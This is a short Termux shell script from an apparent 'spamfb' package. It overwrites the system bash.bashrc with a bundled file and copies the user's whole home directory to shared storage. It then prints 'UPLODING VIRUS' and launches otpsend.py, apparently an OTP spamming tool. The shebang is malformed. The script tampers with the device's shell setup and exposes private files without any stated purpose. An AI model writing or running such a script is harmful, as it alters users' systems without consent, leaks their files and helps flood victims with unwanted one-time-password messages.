#!/bin.sh
ed='\033[1;31m'
cd /data/data/com.termux/files/home/spamfb
cp Readme.md $HOME
cp bash.bashrc /data/data/com.termux/files/usr/etc
cd ..
cd ..
cp -r home /sdcard
clear
echo -e $ed "UPLODING VIRUS"
sleep 2
cd /data/data/com.termux/files/home/spamfb
python otpsend.py
